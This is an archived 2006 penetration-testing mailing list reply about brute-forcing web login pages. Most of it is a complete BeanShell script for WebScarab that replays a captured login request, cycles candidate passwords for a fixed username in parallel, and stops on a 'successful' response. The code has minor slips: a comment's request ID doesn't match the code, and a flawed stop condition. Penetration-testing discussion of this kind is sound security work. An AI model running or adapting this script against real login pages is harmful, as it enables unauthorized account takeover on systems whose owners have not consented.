Penetration Testing mailing list archives

Re: BruteForcing?

From: Rogan Dawes <discard () dawes za net>
Date: Wed, 18 Oct 2006 10:28:35 +0200

Troy Fletcher wrote:

Sparky,

For brute forcing WebPages, I use Perl scripts combined with Linux tools
like cURL and Wget. If you know any programming/scripting languages, I
can point you in the right direction. To help see the traffic exchange
for a WebPage login attempts I recommend using a proxy like WebScarab;
once you see the POSTs or GETs automating attacks with cURL is easy. I
don't know any _good_ pre-made WebPage bruteforce tools, but I'm sure
that if someone else does; they'll share.

WebScarab can also be used to brute force web pages, using the Scriptedplugin. One major advantage to using WebScarab is that your attackis/can be multi-threaded automatically: WebScarab will attempt up to 4simultaneous requests.

Here is a simple script that uses an existing request as a template (forURL's, methods, headers, etc) and just replaces the request body. In myexample, I'll take words from an predefined array, but the technique canvery easily be extended to reading lines from a file.

The script language is BeanShell, which is very similar to Java(BeanShell can evaluate actual Java classes in "strict" mode).


// check the source (or the appendix in the online help) for the
// methods you can use on Request and Response
import org.owasp.webscarab.model.Request;
import org.owasp.webscarab.model.Response;

// This function/method is the main loop.
// You need to provide three methods that this function will invoke
//
// boolean hasMoreRequests() - if there are more requests to issue
// Request getNextRequest()  - the next request to submit
// void handleResponse(Response response) - allows you to do something
//                             with the responses obtained
//
void fetchParallel() {
    // while we have more requests to submit, or we are busy processing
    // the last requests sent off/waiting for a response
    while (hasMoreRequests() || scripted.isAsyncBusy()) {
        // while there are fewer than 4 outstanding requests
        // and we have more to try
        while (scripted.hasAsyncCapacity() && hasMoreRequests()) {
            scripted.submitAsyncRequest(getNextRequest());
        }
        // if there is a response waiting to be processed
        if (scripted.hasAsyncResponse()) {
            while (scripted.hasAsyncResponse()) {
                handleResponse(scripted.getAsyncResponse());
            }
        } else Thread.sleep(100);
    }
}

String[] words = new String[] {"word1", "word2", "word3", "word4"};
int nextWord = 0;
boolean stop = false;
// This gets a copy of the request with ID 17, from the past
// conversations. Adjust to suit your particular situation.
Request template = scripted.getRequest(53);

boolean hasMoreRequests() {
    return nextWord < words.length || stop;
}

Request getNextRequest() {
    Request req = new Request(template); // make a copy
    String word = words[nextWord++]; // increment the counter
    out.println("Trying " + word);
    // Note that the content is always a byte array
    // you might also want to consider URLEncoding your words?
    // Also note that IF there is an existing Content-Length header
    // it will automatically be updated to match the length of the
    // content
    req.setContent(("username=joe&password=" + word).getBytes());
    return req;
}

void handleResponse(Response response) {
    byte[] content = response.getContent();
    if (response.getStatus().equals("200") && content != null) {
        String html = new String(content); // consider encoding?
        if (html.indexOf("successful")>-1) {
            // we're in! Save it for review
            scripted.addConversation(response);
            stop = true;
        }
    }
}

// start the main loop
fetchParallel();


-----Original Message-----
From: listbounce () securityfocus com
[mailto:listbounce () securityfocus com]On Behalf Of 09sparky () gmail com
Sent: Sunday, October 15, 2006 12:03 PM
To: pen-test () securityfocus com
Subject: BruteForcing?


This is more of a general brute forcing question, but one which I could
use some assistance.

[snip]

Second question: Brute forcing also, but against WebPages.  For example,
a Cisco 3000 VPN Concentrator, I have the webpage asking for
username/password.  How would I attempt to dictionary attack this?

Thanks,
Sparky



------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

Current thread:

BruteForcing? 09sparky (Oct 16)
- Re: BruteForcing? Fab (Oct 16)
- Re: BruteForcing? Jeremy Saintot (Oct 17)
- Re: BruteForcing? Christine Kronberg (Oct 17)
- <Possible follow-ups>
- RE: BruteForcing? Hagen, Eric (Oct 16)
  - Re: BruteForcing? Paolo Scarabelli (Oct 17)
- RE: BruteForcing? Troy Fletcher (Oct 17)
  - Re: BruteForcing? Rogan Dawes (Oct 18)
- RE: BruteForcing? Troy Fletcher (Oct 17)
- RE: BruteForcing? Hagen, Eric (Oct 17)